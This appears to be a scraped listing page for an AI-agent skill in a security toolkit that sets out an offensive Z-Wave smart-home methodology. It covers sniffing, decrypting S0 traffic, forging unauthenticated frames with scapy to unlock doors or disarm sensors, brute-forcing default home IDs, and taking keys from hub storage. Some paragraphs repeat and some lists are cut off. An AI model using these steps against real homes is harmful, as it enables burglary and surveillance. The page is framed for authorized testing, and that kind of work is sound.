Stats
Actions
Tags
From cybersec-toolkit
Analyzes Z-Wave smart home security: S0 key derivation flaw, S2 ECDH commissioning review, replay/injection on unauthenticated nodes, and hub pivots. For authorized security assessments of door locks, sensors, and garage controllers.
How this skill is triggered — by the user, by Claude, or both
Slash command
/cybersec-toolkit:offensive-z-waveThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
Z-Wave runs in the 800/900 MHz ISM band (US: 908 MHz, EU: 868 MHz). Older networks used the S0 security scheme with a fixed-derivation network key — long-known to be flawed. S2 (mandatory for Z-Wave Plus v2 since 2017) uses ECDH commissioning and is significantly stronger.
Z-Wave runs in the 800/900 MHz ISM band (US: 908 MHz, EU: 868 MHz). Older networks used the S0 security scheme with a fixed-derivation network key — long-known to be flawed. S2 (mandatory for Z-Wave Plus v2 since 2017) uses ECDH commissioning and is significantly stronger.
| Adapter | Use |
|---|---|
| Z-Force (legacy, hard to find) | Original research tool |
| EZ-Wave (custom HackRF firmware) | Modern, full transceiver |
| Aeotec Z-Stick | Commercial controller, useful as legitimate node |
| HackRF + open Z-Wave firmware | Multi-band SDR approach |
| RTL-SDR + ZniffMobile (passive only) | Cheap sniffer |
# EZ-Wave (HackRF firmware-based)
git clone https://github.com/cureHsu/EZ-Wave
ezwave-sniff -f 908.4MHz -o capture.pcap
# Wireshark with the Z-Wave dissector parses captured frames
wireshark capture.pcap
Look for the inclusion phase (controller adding new device) — that's where the network key is exchanged.
S0 derives the network key from a fixed all-zero PSK during the inclusion of the first device. That fixed material is well-known — any S0 network you sniff during inclusion can be decrypted offline.
S0 commissioning:
1. New node joins → controller sends key with zero-PSK encryption
2. Attacker sniffs commissioning frame → derives session key
3. All future S0 traffic on that network is decryptable
If you can:
You own the network key for that mesh.
S2 fixes S0 by using ECDH for commissioning:
S2 attack surface is mostly implementation:
Many low-end Z-Wave devices (older sensors, basic switches) don't enforce S0 or S2 — they accept commands in cleartext.
# scapy-zwave (community fork) for crafted frames
from scapy.contrib.zwave import *
frame = ZWave(home_id=0x12345678)/ZWaveBasic(set_value=0xff)
sendp(frame, iface='ezwave0')
This unlocks doors / switches lights / unarms sensors when the target lacks authentication.
For old test deployments using default home IDs / network keys:
# Try default home IDs
for hid in 0x00000000 0x12345678 ...; do
ezwave-test --home-id $hid --target-node 1
done
Hit rate on production is low; useful only for default-config IoT lab gear.
Z-Wave devices are typically controlled by a hub (SmartThings, Hubitat, Vera, Home Assistant, Z-Wave JS UI). The hub is a Linux device with the Z-Wave PSK in plaintext storage:
~/.homeassistant/zwave_js.json typically contains keysCompromise the hub → walk away with the Z-Wave PSK + every paired device's command authority. See offensive-iot for hub firmware extraction.
# 1. Identify region + frequency
# US: 908.4 MHz; EU: 868.4 MHz; CN: 868.4 MHz
# 2. Sniff
ezwave-sniff -f 908.4MHz -o cap.pcap
wireshark cap.pcap # filter zwave
# 3. Identify S0 vs S2 from frame format
# 4. For S0: capture inclusion → derive key → decrypt history + control devices
# 5. For S2: focus on hub compromise / DSK theft / implementation bugs
# 6. Test unauthenticated cleartext devices with crafted frames
npx claudepluginhub 26zl/cybersec-toolkit --plugin cybersec-toolkitIoT and embedded device security testing methodology covering hardware recon, firmware acquisition/analysis, bootloader attacks, runtime exploits, wireless protocol attacks, and cloud-IoT API abuse.
Tests IoT devices across hardware, firmware, network, cloud, and mobile surfaces using UART/JTAG debugging, firmware extraction, and protocol analysis.
Performs security assessments of IoT devices and ecosystems via hardware debugging (UART/JTAG), firmware extraction/analysis (Binwalk/Ghidra), network protocol sniffing (Wireshark), cloud APIs, and mobile apps. For IoT pentesting and vulnerability hunting.